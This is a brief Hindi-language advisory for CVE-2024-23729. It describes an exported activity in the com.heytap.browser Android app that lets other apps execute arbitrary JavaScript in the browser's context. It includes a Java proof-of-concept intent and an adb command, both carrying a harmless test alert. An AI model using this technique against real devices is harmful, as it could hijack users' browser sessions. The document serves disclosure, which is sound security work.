
CVE-2024-23729
एंड्रॉइड प्लेटफॉर्म पर com.heytap.browser एप्लिकेशन में एक भेद्यता पाई गई है। यह भेद्यता हमलावर को बिना किसी अनुमति के एप्लिकेशन के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने की अनुमति देती है।
com.heytap.browsercom.heytap.browser ऐप में com.android.browser.RealBrowserActivity गतिविधि निर्यातित है और किसी भी तीसरे पक्ष के एप्लिकेशन द्वारा बिना किसी अनुमति के इसका आह्वान किया जा सकता है। एक दुर्भावनापूर्ण ऐप इसका उपयोग com.heytap.browser एप्लिकेशन के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करने के लिए कर सकता है।
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

सफल शोषण हमलावर को निम्नलिखित की अनुमति देता है:
com.heytap.browser ऐप के संदर्भ में मनमाना जावास्क्रिप्ट कोड निष्पादित करना।